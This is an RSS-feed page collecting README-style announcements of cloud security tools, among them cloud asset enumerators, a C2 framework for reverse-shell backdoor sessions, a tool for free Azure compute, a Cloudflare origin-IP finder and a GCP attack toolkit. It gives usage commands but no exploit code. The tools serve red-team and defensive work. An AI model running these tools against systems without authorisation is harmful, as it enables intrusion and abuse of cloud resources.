FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

CloudBrute - Awesome Cloud Enumerator

By: Zion3R


A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

The complete writeup is available. here


Motivation

we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
Here is the list issues on previous approaches we tried to fix:

  • separated wordlists
  • lack of proper concurrency
  • lack of supporting all major cloud providers
  • require authentication or keys or cloud CLI access
  • outdated endpoints and regions
  • Incorrect file storage detection
  • lack support for proxies (useful for bypassing region restrictions)
  • lack support for user agent randomization (useful for bypassing rare restrictions)
  • hard to use, poorly configured

Features

  • Cloud detection (IPINFO API and Source Code)
  • Supports all major providers
  • Black-Box (unauthenticated)
  • Fast (concurrent)
  • Modular and easily customizable
  • Cross Platform (windows, linux, mac)
  • User-Agent Randomization
  • Proxy Randomization (HTTP, Socks5)

Supported Cloud Providers

Microsoft: - Storage - Apps

Amazon: - Storage - Apps

Google: - Storage - Apps

DigitalOcean: - storage

Vultr: - Storage

Linode: - Storage

Alibaba: - Storage

Version

1.0.0

Usage

Just download the latest release for your operation system and follow the usage.

To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.

It looks like this

providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY

For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.

We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.

After setting up your API key, you are ready to use CloudBrute.

 โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—      โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ•šโ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•
โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ•โ•
โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ•šโ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ• โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]

Awesome Cloud Enumerator

Arguments:

-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config


for example

CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments

If a cloud provider not detected or want force searching on a specific provider, you can use -c option.

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Dev

  • Clone the repo
  • go build -o CloudBrute main.go
  • go test internal

in action

How to contribute

  • Add a module or fix something and then pull request.
  • Share it with whomever you believe can use it.
  • Do the extra work and share your findings with community โ™ฅ

FAQ

How to make the best out of this tool?

Read the usage.

I get errors; what should I do?

Make sure you read the usage correctly, and if you think you found a bug open an issue.

When I use proxies, I get too many errors, or it's too slow?

It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.

too fast or too slow ?

change -T (timeout) option to get best results for your run.

Credits

Inspired by every single repo listed here .



C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

By: Zion3R


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

๐Ÿ”’ Anywhere Access: Reach the C2 Cloud from any location.
๐Ÿ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
๐Ÿ–ฑ๏ธ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
๐Ÿ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

๐Ÿ› ๏ธ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
๐Ÿ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
๐ŸŒ Nginx: Effortlessly routing traffic between web and backend systems.
๐Ÿ“จ Redis PubSub: Serving as a robust message broker for seamless communication.
๐Ÿš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
๐Ÿ’พ Postgres DB: Ensuring persistent storage for seamless continuity.

Architecture

Application setup

  • Management port: 9000
  • Reversse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.

Contact



CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

By: Zion3R


Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


Notes

To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

Required Packages

bash pip3 install -r requirements.txt

Cloning cloudgrep locally

To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

bash chmod +x clone.sh ./clone.sh

Input

This tool offers a CLI (Command Line Interface). As such, here we review its use:

Example 1 - Running the tool with default queries file

Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

Note

Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}

],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}

Run command

python3 main.py

Example 2 - Permiso Intel Use Case

python3 main.py -p

[+] Running GetFileDownloadUrls.*secrets_ for AWS 
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.

Example 3 - Generate report

python3 main.py -p -jo

reports
โ””โ”€โ”€ json
โ”œโ”€โ”€ AWS
โ”‚ย ย  โ””โ”€โ”€ 2024-03-04 01:01 AM
โ”‚ย ย  โ””โ”€โ”€ cloudtrail-logs-00000000-ffffff--
โ”‚ย ย  โ””โ”€โ”€ testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
โ”‚ย ย  โ””โ”€โ”€ GetFileDownloadUrls.*secrets_.json
โ””โ”€โ”€ AZURE
โ””โ”€โ”€ 2024-03-04 01:01 AM
โ””โ”€โ”€ logs
โ””โ”€โ”€ cloudgrappler
โ””โ”€โ”€ okta_key.json

Example 4 - Filtering logs based on date or time

python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

Example 5 - Manually adding queries and data source types

python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

Example 6 - Running the tool with your own queries file

python3 main.py -f new_file.json

Running in your Cloud and Authentication cloudgrep

AWS

Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

Azure

The simplest way to authenticate with Azure is to first run:

az login

This will open a browser window and prompt you to login to Azure.



Cloud_Enum - Multi-cloud OSINT Tool. Enumerate Public Resources In AWS, Azure, And Google Cloud

By: Zion3R


Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.

Currently enumerates the following:

Amazon Web Services: - Open / Protected S3 Buckets - awsapps (WorkMail, WorkDocs, Connect, etc.)

Microsoft Azure: - Storage Accounts - Open Blob Storage Containers - Hosted Databases - Virtual Machines - Web Apps

Google Cloud Platform - Open / Protected GCP Buckets - Open / Protected Firebase Realtime Databases - Google App Engine sites - Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names) - Open Firebase Apps


See it in action in Codingo's video demo here.


Usage

Setup

Several non-standard libaries are required to support threaded HTTP requests and dns lookups. You'll need to install the requirements as follows:

pip3 install -r ./requirements.txt

Running

The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.

You can provide multiple keywords by specifying the -k argument multiple times.

Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.

Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:

./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey

HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10.

./cloud_enum.py -k keyword -t 10

IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.

Complete Usage Details

usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]

Multi-cloud enumeration utility. All hail OSINT!

optional arguments:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Will APPEND found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv - defaults to text)
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans

Thanks

So far, I have borrowed from: - Some of the permutations from GCPBucketBrute



CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

By: Zion3R


Execute code within Azure Automation service without getting charged

Description

CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

  • This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.

  • Each execution is limited to 3 hours


Requirements

  1. Python 3.8+ with the libraries mentioned in the file requirements.txt
  2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
    • Account must be logged in before using this tool

Installation

pip install .

Usage

usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

CloudMiner - Free computing power in Azure Automation Service

optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a
utomationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode

Example usage

Python

Powershell

License

CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

Author - Ariel Gamrian



BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



CloudRecon - Finding assets from certificates

By: Zion3R


CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


Install

** You must have CGO enabled, and may have to install gcc to run CloudRecon**

sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.

The tool suite is three parts in GO:

Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.

Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.

Retr - a tool to parse and search through the downloaded certs for keywords.

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message

Subcommands:

cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

RETR

retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")


CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

By: Zion3R


CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


Key Features:

  • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

  • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

  • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

  • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.

Limitation

infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information. 3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare. " dir="auto">
- Still in the development phase, sometimes it can't detect the real Ip.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.

This tool is a Proof of Concept and is for Educational Purposes Only.

How to Use:

  1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

     git clone https://github.com/spyboy-productions/CloakQuest3r.git
    cd CloakQuest3r
    pip3 install -r requirements.txt
    python cloakquest3r.py example.com
  2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

  3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

  4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

  5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

Run It Online:

Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



Aws-Waf-Header-Analyzer - The Purpose Of The Project Is To Create Rate Limit In AWS WaF Based On HTTP Headers

By: Zion3R


The purpose of the project is to create rate limit in AWS WaF based on HTTP headers.


Golang is a dependencie to build the binary. See the documentation to install: https://go.dev/doc/install

make
sudo make install

The rules configuration is very simple, for example, the threshold is the limited of the requests in X time. It's possible to monitoring multiples headers, but, the header needs to be in HTTP Request header log.

rules:
header:
x-api-id: # The header name in HTTP Request header
threshold: 100

token:
threshold: 1000

It's possible send notifications to Slack and Telegram. To configure slack notifications, you needs create a webhook configuration, see the slack documentation: https://api.slack.com/messaging/webhooks

Telegram bot father: https://t.me/botfather

notifications:
slack:
webhook-url: https://hooks.slack.com/services/DA2DA13QS/LW5DALDSMFDT5/qazqqd4f5Qph7LgXdZaHesXs

telegram:
bot-token: "123456789:NNDa2tbpq97izQx_invU6cox6uarhrlZDfa"
chat-id: "-4128833322"

To set up AWS credentials, it's advisable to export them as environment variables. Here's a recommended approach:

export AWS_ACCESS_KEY_ID=".."
export AWS_SECRET_ACCESS_KEY=".."
export AWS_REGION="us-east-1"

retrive-logs-minutes-ago is the time range you want to fetch the logs, in this example, logs from 1 hour ago.

aws:
waf-log-group-name: aws-waf-logs-cloudwatch-cloudfront
region: us-east-1
retrive-logs-minutes-ago: 60


CloudPulse - AWS Cloud Landscape Search Engine

By: Zion3R


During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find company's asset's on aws cloud:

  • IPs
  • subdomains
  • domains associated with a target
  • organization name
  • discover origin ips

1- Download CloudPulse :

git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/

2- Run docker compose :

docker-compose up -d

3- Run script.py script

docker-compose exec web python script.py

4 - Now go to http://:8000/search and enjoy the search engine

1- download CloudPulse :

git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/

2- Setup virtual environment :

python3 -m venv myenv
source myenv/bin/activate

3- Install requirements.txt file :

pip install -r requirements.txt

4- run an instance of elasticsearch using docker :

docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

5- update script.py and settings file to the host 'localhost':

#script.py
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
#se/settings.py

ELASTICSEARCH_DSL = {
'default': {
'hosts': 'localhost:9200'
},
}

6- Run script.py to index data in elasticsearch:

python script.py

7- Run the app:

python manage.py runserver 0:8000

Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository clone the data and update data.csv file (it contains close to 9 millions data)

as an example searching for .mil data gives:

searching for tesla as en example gives :

CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R


GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Modules

Resource Category Primary Module Command Group Operation Description
User Authentication auth - activate Activate a Specific Authentication Method
- add Add a New Authentication Method
- delete Remove a Specific Authentication Method
- list List All Available Authentication Methods
Cloud Functions functions - list List All Deployed Cloud Functions
- permissions Display Permissions for a Specific Cloud Function
- triggers List All Triggers for a Specific Cloud Function
Cloud Storage storage buckets list List All Storage Buckets
permissions Display Permissions for Storage Buckets
Compute Engine compute instances add-ssh-key Add SSH Key to Compute Instances

Installation

Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via setup.py

git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install

Automated Installation via pip

pip install gator-red

Documentation

Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!

Issues

Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

Contributing

I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



ZeusCloud - Open Source Cloud Security

By: Zion3R


ZeusCloud is an open source cloud security platform.

